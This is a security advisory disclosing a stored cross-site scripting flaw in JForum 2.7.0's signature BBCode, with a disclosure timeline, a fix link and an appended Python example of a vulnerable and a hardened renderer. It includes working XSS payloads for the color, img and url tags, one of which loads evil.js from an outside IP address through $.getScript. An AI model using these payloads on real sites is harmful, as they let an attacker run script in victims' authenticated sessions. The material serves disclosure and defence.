Hi,

I found a vulnerability in JForum 2.7.0. It is a stored cross-site scripting (XSS) vulnerability. The place is the user's profile - signature. The technique of the vulnerability is the same as the one described in the article "STORED CROSS SITE SCRIPTING IN BBCODE" (https://mindedsecurity.com/advisories/msa130510/), and the PoC is:

color tag:
[color=red" onMouseOver="alert('xss')]XSS[/color]
[color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js') ;"]XSS[/color]
Renders into HTML:
XSS XSS

img tag:
[img]/demo.jpg" onMouseOver="alert('xss')[/img]
Renders into HTML:
image

url= tag:
[url='http://www.demo.com" onMouseOver="alert('xss')']test[/url]
Renders into HTML:
test

Through analysis, the forum has set the cookie to HttpOnly, but the attacker can use $.getScript to do some evil things: HttpOnly only stops document.cookie from reading the session cookie, while the injected script still runs inside the victim's authenticated session.

This vulnerability has been fixed in https://sourceforge.net/p/jforum2/code/934/ .

Timeline:
2021-04-21 notified the JForum developer by e-mail
2021-04-22 JForum fixed the vulnerability, and will include this fix in the next release
2021-09-02 sent this mail to bugtraq & fulldisclosure
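As an added illustration (not code from this advisory, from JForum, or from its fix), here is a minimal Python BBCode renderer showing the attribute-injection pattern behind the three PoC strings above next to a hardened version that escapes first and only admits whitelisted parameter values; the regexes, whitelists and the has_inline_handler check are my own assumptions, not JForum's implementation.

```python
import html
import re

# Constructed sample inputs: the three PoC strings quoted in the advisory above.
POC_COLOR = "[color=red\" onMouseOver=\"alert('xss')]XSS[/color]"
POC_IMG = "[img]/demo.jpg\" onMouseOver=\"alert('xss')[/img]"
POC_URL = "[url='http://www.demo.com\" onMouseOver=\"alert('xss')']test[/url]"

COLOR_RE = re.compile(r"\[color=([^\]]*)\](.*?)\[/color\]", re.S)
IMG_RE = re.compile(r"\[img\]([^\[]*)\[/img\]", re.S)
URL_RE = re.compile(r"\[url=([^\]]*)\](.*?)\[/url\]", re.S)

def render_naive(bbcode):
    """Vulnerable pattern (assumed, not JForum's code): the tag parameter is copied
    into an HTML attribute verbatim, so a quote inside it closes the attribute and
    whatever follows (e.g. onMouseOver=...) becomes a new attribute."""
    out = COLOR_RE.sub(r'<font color="\1">\2</font>', bbcode)
    out = IMG_RE.sub(r'<img src="\1">', out)
    return URL_RE.sub(r'<a href="\1">\2</a>', out)

# Whitelists applied to the already HTML-escaped parameter text.
SAFE_COLOR = re.compile(r"^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[A-Za-z]{1,20})$")
SAFE_URL = re.compile(r"^(https?://|/)[^\s]*$")  # http(s) or site-relative only
QUOTES = ("&#x27;", "&quot;")  # what html.escape turns ' and " into

def unquote(value):
    """Strip an optional (escaped) quote wrapper around a url parameter."""
    for q in QUOTES:
        if value.startswith(q) and value.endswith(q) and len(value) > 2 * len(q):
            return value[len(q):-len(q)]
    return value

def render_hardened(bbcode):
    """Escape everything first, then let only validated parameters into attributes.
    A tag whose parameter fails validation is dropped and its text kept."""
    text = html.escape(bbcode, quote=True)
    def color(m):
        value, body = m.group(1), m.group(2)
        return f'<font color="{value}">{body}</font>' if SAFE_COLOR.match(value) else body
    def img(m):
        src = unquote(m.group(1))
        return f'<img src="{src}">' if SAFE_URL.match(src) else src
    def url(m):
        href, body = unquote(m.group(1)), m.group(2)
        return f'<a href="{href}">{body}</a>' if SAFE_URL.match(href) else body
    return URL_RE.sub(url, IMG_RE.sub(img, COLOR_RE.sub(color, text)))

INLINE_HANDLER = re.compile(r"<[^>]*\son\w+\s*=", re.I)

def has_inline_handler(rendered):
    """Review/test check: does any tag in the output carry an on* event attribute?"""
    return INLINE_HANDLER.search(rendered) is not None
```

Running the three PoC strings through render_naive reproduces the injected onMouseOver attribute, while render_hardened drops the tag and keeps only its text.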